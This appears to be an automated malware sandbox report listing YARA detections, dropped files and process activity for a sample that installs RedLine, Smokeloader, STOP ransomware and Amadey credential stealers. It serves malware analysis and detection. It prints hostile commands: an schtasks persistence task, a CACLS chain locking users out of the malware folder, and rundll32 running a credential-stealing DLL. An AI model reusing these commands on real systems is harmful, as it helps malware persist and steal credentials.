                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49954 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.247.35:443 -> 192.168.2.4:49959 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.236.181.126:443 -> 192.168.2.4:49982 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:50039 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.247.35:443 -> 192.168.2.4:50356 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.214.35:443 -> 192.168.2.4:50474 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:50770 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 40.126.32.67:443 -> 192.168.2.4:50827 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.195.35:443 -> 192.168.2.4:50834 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.214.35:443 -> 192.168.2.4:50838 version: TLS 1.2

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                barindex
                                Source: Yara matchFile source: 20.2.79AB.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.79AB.exe.690e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.3.79AB.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.448139316.0000000003041000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.434102717.0000000004611000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.447824560.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.531330257.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.505331035.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: fgifwju, 0000000C.00000002.856460195.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: Yara matchFile source: 16.2.6D94.exe.20515a0.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.6D94.exe.20515a0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 6D94.exe PID: 5332, type: MEMORYSTR

                                System Summary

                                barindex
                                Source: 31.2.nbveek.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                                Source: 29.0.anon.exe.7d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                                Source: 16.2.6D94.exe.20515a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                                Source: 16.2.6D94.exe.20515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                                Source: 16.2.6D94.exe.20515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                                Source: 16.2.6D94.exe.20515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                                Source: 40.0.AAE1.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                                Source: 00000000.00000002.447907484.0000000002EC2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000010.00000002.820966008.00000000007B3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                                Source: 00000000.00000002.448139316.0000000003041000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000003.00000000.434102717.0000000004611000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000014.00000002.528106149.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: 00000000.00000002.447824560.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000014.00000002.530135332.00000000006B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000014.00000002.531330257.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000000.00000002.447763126.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: Process Memory Space: 6D94.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                                Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPEDMatched rule: OlympicDestroyer Payload Author: kevoreilly
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dll, type: DROPPEDMatched rule: OlympicDestroyer Payload Author: kevoreilly
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                                Source: llpb1135.exe.40.drStatic PE information: .vmp0 and .vmp1 section names
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_004106410_2_00410641
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_0040BC160_2_0040BC16
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_004110C90_2_004110C9
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_004126BC0_2_004126BC
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_0040E5EB0_2_0040E5EB
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00410B850_2_00410B85
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001E71FD13_2_001E71FD
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001E81E013_2_001E81E0
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001C6E3013_2_001C6E30
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_010681E014_2_010681E0
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_010671FD14_2_010671FD
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_01046E3014_2_01046E30
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_01176E3015_2_01176E30
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_011971FD15_2_011971FD
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_011981E015_2_011981E0
                                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                                Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6D94.exeSection loaded: yosep.dllJump to behavior
                                Source: Ej3vSx3p8Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: 31.2.nbveek.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                                Source: 29.0.anon.exe.7d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                                Source: 16.2.6D94.exe.20515a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                                Source: 16.2.6D94.exe.20515a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                                Source: 16.2.6D94.exe.20515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                                Source: 16.2.6D94.exe.20515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                                Source: 16.2.6D94.exe.20515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                                Source: 16.2.6D94.exe.20515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                                Source: 40.0.AAE1.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                                Source: 00000000.00000002.447907484.0000000002EC2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000010.00000002.820966008.00000000007B3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                                Source: 00000000.00000002.448139316.0000000003041000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000003.00000000.434102717.0000000004611000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000014.00000002.528106149.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: 00000000.00000002.447824560.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000014.00000002.530135332.00000000006B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000014.00000002.531330257.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000000.00000002.447763126.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: Process Memory Space: 6D94.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                                Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                                Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPEDMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dll, type: DROPPEDMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: String function: 01057990 appears 40 times
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: String function: 01055AC0 appears 130 times
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: String function: 001D5AC0 appears 130 times
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: String function: 001D7990 appears 40 times
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: String function: 01187320 appears 57 times
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: String function: 01172BE0 appears 52 times
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: String function: 01185760 appears 68 times
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: String function: 01185AC0 appears 130 times
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: String function: 01187990 appears 40 times
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401558
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,0_2_00401749
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401564
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401577
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401523
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401585
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040158C
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040159A
                                Source: 3320.exe.3.drStatic PE information: Section: .data ZLIB complexity 0.9918356461560528
                                Source: Ej3vSx3p8Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fgifwjuJump to behavior
                                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@109/38@31/25
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: Ej3vSx3p8Y.exeReversingLabs: Detection: 69%
                                Source: Ej3vSx3p8Y.exeVirustotal: Detection: 52%
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\Ej3vSx3p8Y.exe C:\Users\user\Desktop\Ej3vSx3p8Y.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgifwju C:\Users\user\AppData\Roaming\fgifwju
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe C:\Users\user\AppData\Local\Temp\6267.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\65C3.exe C:\Users\user\AppData\Local\Temp\65C3.exe
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe"
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6D94.exe C:\Users\user\AppData\Local\Temp\6D94.exe
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" /F
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\79AB.exe C:\Users\user\AppData\Local\Temp\79AB.exe
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\cb465ca805" /P "user:N"&&CACLS "..\cb465ca805" /P "user:R" /E&&Exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "nbveek.exe" /P "user:N"
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7E5F.exe C:\Users\user\AppData\Local\Temp\7E5F.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "nbveek.exe" /P "user:R" /E
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe "C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe "C:\Users\user\AppData\Local\Temp\1000014001\anon.exe"
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C99.exe C:\Users\user\AppData\Local\Temp\8C99.exe
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8FF5.exe C:\Users\user\AppData\Local\Temp\8FF5.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
